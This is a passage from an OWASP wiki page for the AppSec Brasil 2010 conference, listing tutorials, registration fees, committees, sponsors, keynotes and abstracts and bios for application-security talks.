Tarcízio Vieira Neto has a degree in Computer Science from Universidade Federal de Goiás (UFG), in Goiania. He began his career as an intern developer on a project of technology initiation funded by CNPq in the company Estratégia, in Goiania. After graduating he worked for six months at the company Fibonacci Soluções Ágeis in the same city, as a development analyst. Then worked for two years and eight months as a Brazilian Air Force officer as a systems analyst in the Air Force Computer Center in Brasilia, where he gained experience with the technologies of digital certification and collaborated in the development of an enterprise electronic document management system.

Currently working at SERPRO since November 2009 as an Analyst in CETEC, working on software development security, dedicated primarily in writing guidelines that standardize techniques and tools tho support security in Web applications development

He is attending a specialization course in Information Security from University of Brasília (UnB) and has altogether more than five years of programming experience in Java.

==The Art and Science of Threat Modeling Web Applications==
[[Image:Mano_Paul.jpg|thumb|10px|frame|right|Mano Paul]]
'''<span style="color: rgb(255, 0, 0);"> This tutorial is in English without translation. </span>'''

'''Date and Time: November 17 (9AM to 6PM)'''<br> '''Instructor: Mano Paul'''<br>

'''Summary'''

To secure your home, you will first need to know how the thief could possibly enter and exit and where you should store your valuables. The same is true of your web applications. Unless you know what the vulnerabilities and threats of your web applications are, and what security measures you should take to protect them, ev1L h@x0rS or the enemy within (insider) could take advantage of the vulnerabilities.

Threat Modeling is a technique that you can use to identify ATVS (attacks, threats, vulnerabilities and safeguards) that could affect your web applications. Threat Modeling helps in designing your application securely from a confidentiality, integrity, availability, authentication, authorization and auditing perspective. It is an essential activity to be undertaken during the design stage of your SDLC and helps mitigate and minimize overall risk.

'''Target audience'''

The target audience is made of technical staff and management of system development organizations, with no required knowledge of languages or specific programming techniques.

'''Learning Objectives'''

# Understand Threat Modeling; when to threat model and when not too
# Translation of threats to risks for the organization
# Have fun learning complex concepts with exercises and interactive games

'''Topic'''

# Introduction
# Why Threat Model?
# Is Threat Modeling Right for You?
# Challenges
# Precursors
# Data Classification and Threat Modeling
# Web Application Security Mechanisms
# Benefits of Threat Modeling
# Common Glossary of Terms
# Threat Agents
# OWASP Top 10 and common application attacks
# Threat Modeling Process
# Attack Trees
# Threat and Risk Frameworks e.g., STRIDE and DREAD
# Threat to Risk translation
# Threat Modeling (<span style="color: rgb(255, 0, 0);">Hands-On Exercise</span>)

'''Instructor'''

Manoranjan (Mano) Paul is the Software Assurance Advisor for (ISC)2. His information security and software assurance experience includes designing and developing security programs from compliance-to-coding, security in the SDLC, writing secure code, risk management, security strategy, and security awareness training and education. He founded and serves as the CEO & President of Express Certifications. He also founded SecuRisk Solutions, a company that specializes in security product development and consulting.

== Security in Service-oriented architectures ==

'''<span style="color: rgb(255, 0, 0);"> Tutorial in Portuguese. </span>'''

'''Date and time: Nov 17 (9AM to 6PM)'''<br> '''Instructors: Douglas Rodrigues, Julio Cesar Estrella e Nuno Manuel dos Santos Antunes'''<br>

'''Summary'''

Web services are the cornerstone of Service-Oriented Architectures (SOA). As critical components of business, Web services must provide high security. However, the deployment of secure Web services is a complex task. In fact, several studies show that a large number of Web Services are deployed with security breaches ranging from code vulnerabilities (eg vulnerabilities that allow code injection, including SQL injection and XPath injection) to the incorrect use of standards and security protocols. The aim of this short course is to present the theoretical and practical tools that allow the detection of vulnerabilities and security protocols and mechanisms against attacks.

'''Público Alvo'''

The target audience is composed of technical staff and operational systems development organizations with requirements for knowledge of languages and programming methodologies at the intermediate level.

'''Learning Objectives'''

The proposed short course contributes to add new technological trends. The theme is quite interesting in relation to the great challenges of research in computing, since it fits naturally within the technological development of quality, encompassing making systems available, accurate, secure, scalable, persistent and ubiquitous, and notoriously, observing the conference area, which SOA, Web services and security are the subject of growing research in computing, as it is current and of interest to the academic community, as well as professionals who work in the labor market. The interest in SOA has grown in recent years because it is an approach that helps the system to remain flexible and scalable as they grow, and can also help to resolve the gap business / IT. Students and professionals will have the opportunity to understand the basics of vulnerability detection code level and also to detect attacks between protocols and mechanisms. The idea is that participants can use the knowledge gained in this brief short course for the development of distributed applications using Web services secure and obtain knowledge needed to diagnose and prevent attacks on this type of application.

'''Topics'''

#SECURITY STANDARDS AND PROTOCOLS FOR WEB SERVICES
#ATTACKS IN WEB SERVICES
## Denial of Service Attacks
## Attacks Brute Force
## Spoofing Attacks
## Flooding Attacks
## Injection Attacks
#EVALUATING SECURITY IN WEB SERVICES
## Case Study on security in Web Services
## "white box" analysis
## "Black-box" testing
## "Gray-box" testing
## Case study on the effectiveness of tools for security assessment

'''Instructors'''

Julio Cesar Estrella - Master in Computer Science and Computational Mathematics, in the area of Distributed Systems (Institute of Mathematical Sciences and Computer ICMC / University of São Paulo - USP). During the Masters, worked with simulated queuing network in a project related to the development of negotiation techniques in models of web servers with service differentiation. Ph.D. in Computer Science and Computational Mathematics (Institute of Mathematical Sciences and Computer ICMC / University of São Paulo - USP). The theme of his doctoral thesis was about service-oriented architectures to support QoS and characterization of workloads for Web Services Composition and Service also supports Quality of Service. He is currently a professor at the Federal Technological University of Paraná (UTFPR - Campo Mourão)

Douglas Rodrigues - Master in Computer Science and Computational Mathematics from Institute of Mathematics and Computer Science, University of São Paulo - ICMC-USP/São Carlos. Bachelor of Computer Science from University Euripides Marília - Univ - Marília / SP. Works on the following subjects: SOA, Web Services, performance evaluation, encryption and security.

Nuno dos Santos Antunes - attended from 2003 to 2007, the Computer Engineering program, University of Coimbra. Since 2008, carries out scientific research in the group of Software and Systems Engineering (SSE) Center for Informatics and Systems University of Coimbra (CISUC), on topics related to methodologies and tools for developing Web Services without vulnerabilities. Concluded in 2009 a Masters in Computer Engineering from the Department of Computer Engineering, University of Coimbra, with the final rating of Very Good. In 2009 he began his PhD in Sciences and Information Technology. He published five scientific papers in conferences with the process of rigorous peer review, including articles in the most prestigious conferences in the areas of reliability and services.

==Black-Box & White-Box ASP.NET Security Reviews using the OWASP O2 Platform==

'''<span style="color: rgb(255, 0, 0);"> Thsi tutorial will be in Portuguese with materials in English </span>'''

'''Date and time: November 16th (9AM to 6 PM)'''<br> '''Instructor: Dinis Cruz'''<br>

'''Summary'''

This is a hands-on Training course on how to use the OWASP O2 Platform to perform both Black-Box and White-Box security reviews on ASP.NET Web Applications

The course is designed for security consultants/developers who are responsible for performing Penetration Tests or Security Code Reviews. The course will show practical examples of how to use the OWASP O2 Platform to find, exploit and document security vulnerabities.

For the course's labs, a number of test and real-world applications/frameworks will be used. In order to give the students a benign test enviroment which is easy to replicate, the (vulnerable-by-design) HacmeBank ASP.NET banking application will be used throughout the course.

'''Topics'''

* What is the OWASP O2 Platform and how to use it?
* Using O2's Unit Tests for web exploration and browsing
* Using O2's Unit Tests for web exploitation
* Understanding and using O2's Web Automation Tools to find and exploit vulnerabilities in HacmeBank (Black-Box)
* Understanding and using O2's AST .NET Scanner to find vulnerabilities in HacmeBank (White-Box)
* Connecting the source-code traces with the web exploits to create a unified view of the vulnerabilties
* Create 'Vulnerability-driven Unit Tests' to be delivered to Developers, QA/Testers and Managers
* Customizing and writing new APIs (for new or modified frameworks)
* Using O2 to consume results from open source tools and 3rd party commercial vendors
* Case Study: Microsoft ASP.NET MVC
* Case Study: Microsoft Sharpoint

'''Instructor'''

The course is delivered by Dinis Cruz who the lead developer of the OWASP O2 Platform and has created and delivered a number of .NET Security training courses

== Location ==

Please check the ''Venue'' tab in this page.

==== Venue ====

The event will be held in Campinas, SP, Brazil at: [http://www.cpqd.com.br Fundação CPQD].

You can check the location at [http://maps.google.com.br/maps/ms?source=embed&hl=pt-BR&geocode=&ie=UTF8&update=1&t=h&msa=0&msid=104978801628275418750.000462bf2d1a49a7571af&ll=-22.83125,-47.044315&spn=0.03718,0.04034&z=14 Google Maps]

''How to get there''

TBD

==== Registration ====

== Online Registration ==

Registration form is available at https://creator.zoho.com/lucas.ferreira/appsec/

== Conference Fees ==

'''Access to conference:'''

* Before Sep 16th: 400.00 BRL
* Before Oct 16th: 500.00 BRL
* Before Nov 12th: 550.00 BRL
* On site: 600.00 BRL

On site registration subject to the availability of seats.

'''Trainings'''

* One day: 450.00 BRL
* Two days: 900.00 BRL

'''Discounts'''

* OWASP Member: 100.00 BRL (Note: This discount is greater than the OWASP USD 50.00 annual fee. Check [http://www.google.com.br/#q=50+usd+in+brl&fp=1 here]
* Student: 100.00 BRL (Note: student ID required).
* Special discounts available for groups registrations. Please send inquiries to organizacao2010@appsecbrasil.org

==== Committees ====

== Conference Committee ==

OWASP Global Conferences Committee Chair: Mark Bristow

OWASP [[Brazilian]] Chapter Leader: Wagner Elias

AppSec Brasil 2010 Organization Team (organizacao2010 at appsecbrasil.org):

*Conference General Chair: Lucas C. Ferreira
*Tutorials Chair: Eduardo Camargo Neves
*Tracks Chair: Luiz Otávio Duarte
*Local Chair: Alexandre Melo Braga

=== Team Members ===

*Alexandre Melo Braga
*Eduardo Camargo Neves
*Lucas C. Ferreira
*Luiz Otávio Duarte
*Wagner Elias
*Eduardo Alves Nonato da Silva
*Leonardo Buonsanti
*Dinis Cruz
*Paulo Coimbra

== Programme Committee:==
* Alexandre Braga
* Carlos Serrao
* Eduardo alves
* Fernando Cima
* Leonardo Buonsanti
* Lucas Ferreira
* Luiz Duarte
* Nelson Uto
* Rodrigo Rubira
* Wagner Elias

<br> <br>

==== Travel ====

==== Twitter ====

<twitter>124443335</twitter>

==== Links ====

Blog: http://blog.appsecbrasil.org

Twitter: http://twitter.com/owaspappsecbr

Banner: http://www.owasp.org/images/3/31/AppSec_Brasil_2010_Banner.gif

Powerpoint template: [[Media:OWASP_Presentation_Template_BrazilAppSec2010.ppt]]

<br> <headertabs />

[[Category:OWASP_AppSec_Conference]]

AppSec Brasil 2010

2010-10-22T19:58:36Z

Edualves: /* Attendee Kit Sponsors */

__NOTOC__

[[Image:LogoAppSecBrazil.002.jpg|center]]

'''Para a versão em português, veja em [[AppSec Brasil 2010 (pt-br)]]'''

= OWASP AppSec Brasil 2010 =

The Second Edition of OWASP's flagship conference in South America will happen in Campinas, SP, Brazil. The Conference consists of two days of training sessions, followed by a two-day conference on a single track.
<center>
[[Image:AppSec Brasil 2010 Campinas.jpg|500px]]
</center>
== Conference Dates ==

The conference will happen from '''November 16th, 2010 to November 19th, 2010'''. The first two days will be tutorial days (see below). Plenary sessions will be held on November 18th and 19th.
<br>

==== About ====

== About the conference ==

Following the success of the first AppSec Brasil, held in Brasilia in 2009, the OWASP Brazilian Chapter is organizing its second edition in 2010. AppSec Brasil 2010 will happen in the city of Campinas, located 90 km from São Paulo.

Campinas is the 3rd biggest city in the State of São Paulo and is an important economic center and hosts major universities and research centers. It is known to concentrate several high tech industries, including important multi-national companies in the fields of electronics, telecom and chemicals.

This year, we expect to gather a number of Brazilian and Latin American practitioners and researchers to share state-of-the-art information about application security.

==== Sponsorship ====

We are currently soliciting sponsors for the AppSec Brasil 2010 Conference. Detailed [[Media:OWASP_-_Sponsorship_Opportunities_-_EN_V.1.2.pdf|sponsorship oportunities]] are now available.

If you are interested in sponsoring AppSec Brasil 2010, please contact the Conference Organization Team (organizacao2010@appsecbrasil.org).

== Sponsors ==

== Platinum Sponsors ==
{|
| [[Image:AppSec Brasil 2010 CPQD.jpg|200px|link=http://www.cpqd.com.br]]
|-
|  
|-
|}

== Gold Sponsors ==
{|
| [[Image:LeadComm Logo Screen.jpg|150px|link=http://www.leadcomm.com.br]]
| width="50" | <br>
| [[Image:Logo PagSeguro-Uma empresa-UOL.jpg|150px|link=http://www.pagseguro.uol.com.br]]
|-
|  
|-
|}

== Silver Sponsor ==

{|
|-
| [[Image:AppSec Brasil 2010 Serpro.png|150px]]
|-
|  
|}

<br>

=== Attendee Kit Sponsors ===
{|
| [[Image:Logotipo_Conviso_2009_Cor.png|150px]]
| width="50" | <br>
| [[Image:lgClavis.png|110px|link=http://www.clavis.com.br]]
|-
|  
|-
|}
<br>

== Promoted by ==
<center>
[[Image:Appsec Brasil 2010 InstitutoTuring.png]]
</center>
==== Keynotes ====

==Robert 'Rsnake' Hansen ==

[http://www.sectheory.com/ SecTheory]

'''''Title:''''' '''The Humble Cookie'''

'''''Abstract:'''''
The simplest thing in our browser that has caused the most confusion and worry is the cookie. This presentation will discuss what it is, how cookies work, the little known aspects of them, and dozens of attacks to steal them, set them, crack them or abuse trust based on them.

'''''Bio:''''' Robert Hansen aka RSnake is the CEO and founder of SecTheory. He has worked for Digital Island, Exodus Communications and Cable & Wireless in varying roles from Sr. Security Architect and eventually product managing many of the managed security services product lines. He also worked at eBay as a Sr. Global Product Manager of Trust and Safety, focusing on anti-phishing, anti-DHTML malware and anti-virus strategies. Later he worked as a director of product management for Realtor.com. Robert sits on the advisory board for the Intrepidus Group, previously sat on the technical advisory board of ClickForensics and currently contributes to the security strategy of several startup companies.

Mr. Hansen wrote Detecting Malice, authors content on O'Reilly and co-authored "XSS Exploits" by Syngress publishing. He sits on the NIST.gov Software Assurance Metrics and Tool Evaluation group focusing on web application security scanners and the Web Application Security Scanners Evaluation Criteria (WASC-WASSEC) group. He also has briefed the DoD at the Pentagon and speaks at SourceBoston, Secure360, GFIRST/US-CERT, CSI, Toorcon, APWG, ISSA, TRISC, World OWASP/WASC conferences, SANS, Microsoft's Bluehat, Blackhat, DefCon, SecTor, BSides, Networld+Interop, and has been the keynote speaker at the New York Cyber Security Conference, NITES and OWASP Appsec Asia. Mr. Hansen is a member of Infragard, West Austin Rotary, WASC, IACSP, APWG, contributed to the OWASP 2.0 guide and is on the OWASP Connections Committee.

Robert also maintains the http://ha.ckers.org website where he discuss web application security and provides lots of useful content to be used against web application attacks.

== Jeremiah Grossman ==

[http://www.whitehatsec.com/ WhiteHat Security]

'''''Title:''''' '''TBD.'''

'''''Bio:''''' Jeremiah Grossman, founder and CTO, WhiteHat Security, is a world-renowned Web security expert. A co-founder of the Web Application Security Consortium (WASC), he was named to InfoWorld's Top 25 CTOs in 2007 and is frequently quoted by business and technical media. He has authored dozens of articles and whitepapers, is credited with the discovery of many cutting-edge attack and defensive techniques, and is a co-author of "XSS Attacks: Cross Site Scripting Exploits and Defense." Grossman is also an influential blogger who offers insight and encourages open dialogue regarding Web security research and trends. Prior to WhiteHat, Grossman was an information security officer at Yahoo!

<br>

==== Invited Speakers ====

== Samy Kamkar==

'''''Title:''''' '''How I Met Your Girlfriend: The discovery and execution of entirely new classes of Web attacks in order to meet your girlfriend.'''

'''''Abstract:'''''
This includes entertaining and newly discovered attacks including PHP session
prediction and random numbers (accurately guessing PHP session cookies),
browser protocol confusion (turning a browser into an SMTP server), firewall and
NAT penetration via Javascript (turning your router against you), remote iPhone
Google Maps hijacking (iPhone penetration combined with HTTP man-in-themiddle),
extracting extremely accurate geolocation information from a Web browser
(not using IP geolocation), and more.

'''''Bio:'''''
Samy Kamkar is best known for the Samy worm, the first XSS worm,
infecting over one million users on MySpace in less than 24 hours. A cofounder
of Fonality, Inc., an IP PBX company, Samy previously led the
development of all top-level domain name server software and systems for
Global Domains International (.ws).

In the past 10 years, Samy has focused on evolutionary and genetic
algorithmic software development, Voice over IP software development,
automated security and vulnerability research in network security, reverse
engineering, and network gaming. When not strapped behind the Matrix,
Samy can be found stunt driving and getting involved in local community
service projects.

== Mano Paul ==

'''''Title:''''' '''Wild Wild Wild Security Planet'''

'''''Abstract:'''''
Organisms keep themselves safe in a world that's every bit as unpredictable
as our world. This presentation will parallel what we can learn from the
world of art, literature, science, nature and apply it to the world of
software security. For e.g., If Shakespeare had to write about software
security, what would he write? What does a naked motorist have to do with
loose lips that sink ships? What does pH have to do with software
vulnerabilities? What does the Stick Insects' regenerative ability have to
do with software 'bugs'? or can the Ostrich sticking its head in the sand
behavior reflect the modicum of risk management we observe today and many
more ...

The talk would be a fun-filled, extremely interactive session covering
various concepts of security from risk management, defense in depth, secure
programming, threats and vulnerabilities and compliance and more ... Come to
find out the answers to the questions above and see what it takes to develop
software with a security mindset throughout its life cycle. Come and look at
software security from a different perspective that would make ALL the
difference for you and your company.

'''''Bio:'''''
[[Image:Mano_Paul.jpg|thumb|10px|frame|left|Mano Paul]]
<b>Shark Researcher turned Security Guru!</b><br>
<b>Manoranjan (Mano) Paul</b> (CSSLP, CISSP, AMBCI, MCSD, MCAD, CompTIA Network+, ECSA) is the Founder and CEO at [http://www.securisksolutions.com SecuRisk Solutions] and [http://www.expresscertifications.com Express Certifications]. Based out of Austin, Texas in the USA, SecuRisk Solutions specializes in three areas of information security solutions - Product Development, Consulting and Awareness, Training & Education while Express Certifications focuses on professional certifications like the CISSP, SSCP, CSSLP and the BCI certificate.

Before SecuRisk Solutions and Express Certifications, Mano played several roles from software developer, quality assurance tester, logistics manager, technical architect, IT strategist and Security Engineer/Program Manager/Strategist at Dell Inc. His information security experience includes designing and developing software security programs from Compliance-to-Coding, application security risk management, security strategy & management, and conducting security awareness training and education.

Mano started his career as a shark researcher in the Bimini Biological Field Station, Bahamas. His educational pursuit took him to the University of Oklahoma where he received his Business Administration degree in Management Information Systems (MIS) with various accolades and the coveted 4.0 GPA. He was a member and chair of the OWASP Global Education Committee and actively participates in OWASP speaking, training and leadership events. He is also the appointed Software Assurance Advisor for (ISC)<sup>2</sup>, representing and advising the organization on software assurance strategy, training, education and certification. He is an appointed faculty member and industry representative of the Capitol of Texas Information System Security Association (ISSA) chapter.

Mano has been featured in various domestic and international security conferences and is an invited speaker and panelist, delivering talks and keynotes in conferences such as the OWASP, CSI, Burton Group Catalyst, TRISC and SC World Congress conferences. He is the author of the Official (ISC)<sup>2</sup> Guide to the Certified Secure Software Lifecycle Professional (CSSLP<sup>CM</sup>), contributing author for the Information Security Management Handbook, writes periodically for the Certification Magazine and has contributed to several security topics for the Microsoft Solutions Developer Network (MSDN).

Mano is married to whom he calls the “most wonderful and sacrificial person in this world” - Sangeetha Johnson and their greatest fulfillment comes from spending time with the son – Reuben A Paul (RAP).

==Chris Hofmann==

'''''Title:''''' '''TBD'''

'''''Abstract:''''' TBD.

'''''Bio:''''' TBD.

====Speakers====

==Cassio Goldschmidt==
Symantec

'''''Title:''''' '''Responsibility for the Harm and Risk of Software Security Flaws'''

'''''Abstract:'''''
Who is responsible for the harm and risk of security flaws? The advent of worldwide networks such as the internet made software security (or the lack of software security) became a problem of international proportions. There are no mathematical/statistical risk models available today to assess networked systems with interdependent failures. Without this tool, decision-makers are bound to overinvest in activities that don’t generate the desired return on investment or under invest on mitigations, risking dreadful consequences. Experience suggests that no party is solely responsible for the harm and risk of software security flaws but a model of partial responsibility can only emerge once the duties and motivations of all parties are examine and understood.

State of the art practices in software development won’t guarantee products free of flaws. The infinite principles of mathematics are not properly implemented in modern computer hardware without having to truncate numbers and calculations. Many of the most common operating systems, network protocols and programming languages used today were first conceived without the basic principles of security in mind. Compromises are made to maintain compatibility of newer versions of these systems with previous versions. Evolving software inherits all flaws and risks that are present in this layered and interdependent solution. Lastly, there are no formal ways to prove software correctness using neither mathematics nor definitive authority to assert the absence of vulnerabilities. The slightest coding error can lead to a fatal flaw. Without a doubt, vulnerabilities in software applications will continue to be part of our daily lives for years to come.

Decisions made by adopters such as whether to install a patch, upgrade a system or employed insecure configurations create externalities that have implications on the security of other systems. Proper cyber hygiene and education are vital to stop the proliferation of computer worms, viruses and botnets. Furthermore, end users, corporations and large governments directly influence software vendors’ decisions to invest on security by voting with their money every time software is purchased or pirated.

Security researchers largely influence the overall state of software security depending on the approach taken to disclose findings. While many believe full disclosure practices helped the software industry to advance security in the past, several of the most devastating computer worms were created by borrowing from information detailed by researcher’s full disclosure. Both incentives and penalties were created for security researchers: a number of stories of vendors suing security researchers are available in the press. Some countries enacted laws banning the use and development of “hacking tools”. At the same time, companies such as iDefense promoted the creation of a market for security vulnerabilities providing rewards that are larger than a year’s worth of salary for a software practitioner in countries such as China and India.

Effective policy and standards can serve as leverage to fix the problem either by providing incentives or penalties. Attempts such PCI created a perverse incentive that diverted decision makers’ goals to compliance instead of security. Stiff mandates and ineffective laws have been observed internationally. Given the fast pace of the industry, laws to combat software vulnerabilities may become obsolete before they are enacted. Alternatively, the government can use its own buying power to encourage adoption of good security standards. One example of this is the Federal Desktop Core Configuration (FDCC).

'''''Bio:'''''
Cassio Goldschmidt is senior manager of the product security team under the Office of the CTO at Symantec Corporation. In this role he leads efforts across the company to ensure
secure development of software products. His responsibilities include managing Symantec’s internal secure software development process, training, threat modeling, penetration testing and vulnerability manegement. Cassio’s background includes over 14 years of technical and managerial experience in the software industry. During the eight years he has been with Symantec, he has helped to architect, design and develop several top selling product releases, conducted numerous security classes, and coordinated various penetration tests. Cassio is also known for leading the OWASP chapter in Los Angeles and is a frequent speaker at security conferences worldwide.

Cassio represents Symantec on the SAFECode technical committee and (ISC)2 in the development of the CSSLP certification. He holds a bachelor degree in computer science from Pontificia Universidade Catolica do Rio Grande Do Sul, a masters degree in software engineering from Santa Clara University, and a masters of business administration from the University of Southern California.

==Amichai Shulman==
Imperva

'''''Title:''''' '''Business Logic Attacks – BATs and BLBs'''

'''''Other authors:''''' Amichai Shulman, Rob Rachwald

'''''Abstract:'''''
Cyber attacks are being committed more often by professionals, and are increasingly driven by financial motives. Researchers have discovered the increasing popularity of a certain class of attacks that target business logic. Business logic attacks are a set of legal application transactions that are used to carry out a malicious operation that is not part of normal business practices. For example, brute forcing coupon codes in an ecommerce application to receive multiple discounts. This presentation will provide a quick introduction to business logic attacks, their unique characteristics and the motivation behind their uptick. The session will suggest a classification method for these attacks from which attendees can draw a set of required mitigation capabilities. We will discuss capabilities required for detecting automated interaction with the application, different types of repetitions, flow tampering and even compromised credentials. We will also contemplate on the usage of mitigation techniques such as Captcha, introducing delays and more. Concluding this session we will bring up the claim that all these capabilities can be introduced in the form of a "virtual patch" using a web application firewall, rather than being exclusively fixed in application code.

'''''Bio:'''''
Amichai Shulman is Co-Founder and CTO of Imperva, where he heads the Application Defense Center (ADC), Imperva's internationally recognized research organization focused on security and compliance. Mr. Shulman regularly lectures at trade conferences and delivers monthly eSeminars. The press draws on Mr. Shulman's expertise to comment on breaking news, including security breaches, mitigation techniques, and related technologies. Under his direction, the ADC has been credited with the discovery of serious vulnerabilities in commercial Web application and database products, including Oracle, IBM, and Microsoft. Prior to Imperva, Mr. Shulman was founder and CTO of Edvice Security Services Ltd., a consulting group that provided application and database security services to major financial institutions, including Web and database penetration testing and security strategy, design and implementation. Mr. Shulman served in the Israel Defense Forces, where he led a team that identified new computer attack and defense techniques. He has B.Sc and Masters Degrees in Computer Science from the Technion, Israel Institute of Technology.

==Gabriel Quadros==
Conviso IT Security

'''''Title:''''' '''Taint Analysis of JavaScript Code to Detect Web Application Vulnerabilities'''

'''''Abstract:'''''
Modern Web applications make increasing use of client-side code, with JavaScript being the most present in most of them. Several vulnerabilities are introduced through the careless use of this language. The publicly available analysis tools are usually based on pattern matching to find potential vulnerabilities, but this is not an efficient approach to analyze large amounts of code. Therefore, there is a need to develop tools to perform more advanced analysis like Taint Analysis and Symbolic Execution. This article discusses various approaches to dynamic analysis of JavaScript code and presents the JsInstrumentator tool, which is being developed by Conviso Security Labs.

'''''Bio:'''''
Gabriel Quadros começou a estudar segurança da informação em 2003, com interesse principal em engenharia reversa, pesquisa de vulnerabilidades e desenvolvimento de exploits.

Atualmente cursa o último ano do Bacharelado em Ciência da Computação na Universidade Estadual do Sudoeste da Bahia - UESB.

Em abril de 2010, começou suas atividades como consultor de segurança na Conviso IT Security.

==Tony Rodrigues==
Provider IT Business Solutions

'''''Title:''''' '''Tony’s Top 10 Application Artifacts: A Computer Forensics Approach to OWASP Top 10'''

'''''Abstract:'''''
Application Computer Forensics has many peculiarities comparing to others Computer Forensics disciplines. It requires not only distinctive techniques but also deep knowledge of specific artifacts. This presentation is about the top ten artifacts related to application computer forensics/digital investigations and their relation to OWASP Top 10 Risks.

'''''Bio:'''''
Tony Rodrigues é um profissional certificado CISSP, CFCP e Security+ com mais de 20 anos de experiência em TI e 8 anos em Gestão de Segurança de Informações. Já liderou várias investigações, perícias e pesquisas sobre Computação Forense. Tony é consultor em Segurança de Informações e palestrou em importantes conferencias internacionais (CNASI, H2HC,YSTS). É autor/criador do blog forcomp.blogspot.com, sobre Resposta a Incidentes e Forense Computacional e também colabora com artigos no blog de Computer Forensics da SANS.

==Henrich Christopher Pöhls==
University of Passau - ISL

'''''Title:''''' '''The State of XML Digital Signatures --- How to Avoid Technical Pitfalls and Harvest the Power of Newer Signature Schemes'''

'''''Abstract:'''''
XML Digital Signatures are a complex tool, applied right they help to ensure legal compliance,
but there are many pitfalls.
This talk will provide some basic steps that users and implementers should follow to avoid the pitfalls,
among them are:
* Solid Understanding of the XML Signature processing and verification steps
* Use of simplistic and coherent references when creating XML Digital Signature
* Know how to Test what was signed before acting upon it (BitFlip Test)
The Talk will also provide an overview of new applications for recent and more specialized
digital signature schemes, like sanitizable signature schemes (academic research since roughly 2000) that allow to deal with the need
to modify already signed content. And it will highlight the security relevant changes that are planned
for the upcoming version of XML Signature Syntax and Processing 2.0.

'''''Bio:'''''
Henrich C. Pöhls has presented his scientific work on digital signatures at several academic conferences (i.e. ICICS, GI, Invited Talks) or to technical audiences (i.e. DFN CERT, OWASP). Instructor of a practical IT-security university class for Computer Science and IT-Security Master students for the last 7 years. He has established this course first at the University of Hamburg in 2004 and than at the University of Passau in 2008. The course, now titled "Security Infrastructures", is centered around security infrastructures focussing on secure & authenticated access through the use of digital signatures.

It involves setting-up a certificate authority, using digital signatures and X509 certificates mostly for authentication in open-source software like client and server authentication with apache, secure DNS zone transfers, or client and server authentication in openvpn, as well as in MS Windows environments.It also covers certificate revocation using CRLs and OCSP. Henrich C. Pöhls draws from a rich repository of his own experience from his academic research in the field and the 7 years of using the available tools for creating, applying and managing digital signatures and X509 certificates in different versions and seeing his students struggle with the pitfalls trying to get it to work.

==Rodrigo Montoro==
Trustwave Spiderlabs

'''''Title:''''' '''Web Application First Aid - Virtual Patching with ModSecurity'''

'''''Abstract:'''''
This presentation will show how to mitigate security problems that you may found after your application goes to the real world . Weʼll talk about how to analyze a security report, understand how modsecurity works and how based on the report to create a virtual patching using modsecurity rules.

'''''Bio:'''''
Rodrigo “Sp0oKeR” Montoro possui grande experiência em ambientes opensource e mercado de segurança especialmente na parte de IPS/IDS , malwares e protocolos. Atualmente trabalha no time de pesquisas do SpiderLabs (Trustwave) onde faz parte do core team de assinaturas do modsecurity além de analise de malwares, assinaturas de IDS e pesquisas na area de arquivos maliciosos especialmente pdfʼs.

==Brian Contos==
McAfee

'''''Title:''''' '''Exploring Three Modern Attack Vectors: Insiders, Industrialized and APTs'''

'''''Abstract:'''''
Attacks are coming from all angles. In some cases they are very rudimentary; in others they are highly complex. Organizations must be able to protect themselves regardless, and do so in a way this is in parity with business operations, maintains employee and partner agility, and is manageable without the complexity of the solution being worse than the attack itself.

Failure to address these three different attack types can result in everything from diminished brand loyalty, regulatory penalties, and lost revenue, to stolen intellectual property, economic competitive disadvantage, and military competitive disadvantage.
Based on research from McAfee Labs and customer interactions across the globe in the public and private sector, there is much information that can be shared about these attackers and their strategies.

Attendees will leave the presentation more knowledgeable about insider threats, industrialized hacking, and APTs. They will have a strong grasp of the attacker motives and understand their attack vectors. The audience will also be exposed to several non-vender, non-product specific countermeasures that they can leverage within their own organizations.

'''''Bio:'''''
Mr. Contos has over 15 years of security engineering and management expertise. He has worked throughout North and South America, Europe, the Middle East, and Asia. At McAfee he advises government organizations and G2000s on security strategy. He has written two books including Enemy at the Water Cooler – Real Life Stories of Insider Threats, and Physical and Logical Security Convergence which he co-authored with former NSA Deputy Director William Crowell. He has delivered speeches at industry events like RSA, Black Hat, Interop, OWASP, CSI, ISACA, ISSA, InfraGard and eCrime. He is often quoted by business and industry press, and has written articles for Forbes, NY Times, London Times, Computerworld, and many others. He was formerly the Chief Security Strategist for Imperva, the Chief Security Officer for ArcSight, and has held management and engineering positions at Riptech, Bell Labs, Tandem Computers, and DISA.

==Christophe De La Fuente==

'''''Title:''''' '''Testing and Fuzzing FLEX: More fun with RIA'''

'''''Additional author:''''' '''Matt Tesauro'''

'''''Abstract:'''''
FLEX is a popular choice for the brave new world of web 2.0 applications. While the game may have appeared to change, rich Internet applications (RIA) still allow for the same vulnerabilities and design mistakes to be made. This presentation will cover methods for testing Adobe FLEX applications including the new version 4 and will look at such issues as cross--site flashing, remote calls and fuzzing. Additionally, there will be coverage of tools to test FLEX and other Flash applications including their addition to the OWASP WTE (Web Testing Environment). Finally, some design issues which may hamper FLEX development will be discussed in a brief case study.

'''''Bio:'''''
Christophe is a Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, and Incident Response for Trustwave's clients.

Christophe has extensive experience in penetration tests on web application and network infrastructure. He has a background testing a large range of applications, from traditional client/server applications to web applications and web services. In addition to his information security experience, Christophe has experience developing software and web applications. Christophe also has an interest in reverse code engineering for malware analysis and vulnerability research. He as taught post--graduate level university course in the field of web application security testing.

==Mauro Risonho de Paula Assumpção==

'''''Title:''''' '''The Tao of Hacking - Detecting Vulnerabilities in Web based Network Devices'''

'''''Abstract:'''''
This talks relates to the design flaws and vulnerabilities in various network peripheral devices
used for security which are having web interfaces. We will be talking about some of the
vulnerabilities that we have discovered while pen testing these devices. Further , this talk also
lays emphasis on collecting information about internal networks from the network devices like
load balancers, firewalls, disk stations, proxies, surveillance cameras etc. The aim is to gather
maximum infomation from these devices and using that information to test the security of these
devices and detecting vulnerabilities in them. This talk is pure conceptual and technical talk
designed in an easy way to share information among masses.

'''''Bio:'''''
Mr. Mauro Assumpção Cheshire Paula aka firebits is a security researcher and lecturer at security conferences. He is working as director of NSEC Security Systems, an organization that provides consulting services for security and penetration testing. He has performed numerous safety tests and development projects for organizations such as Intel, Google, Microsiga, Avon, CMS Energy, Unilever, Rhodia, Tostines, Degussa, Niplan and others. He is founder and "Backtrack Brazil" and moderator and translator Backtrack USA.

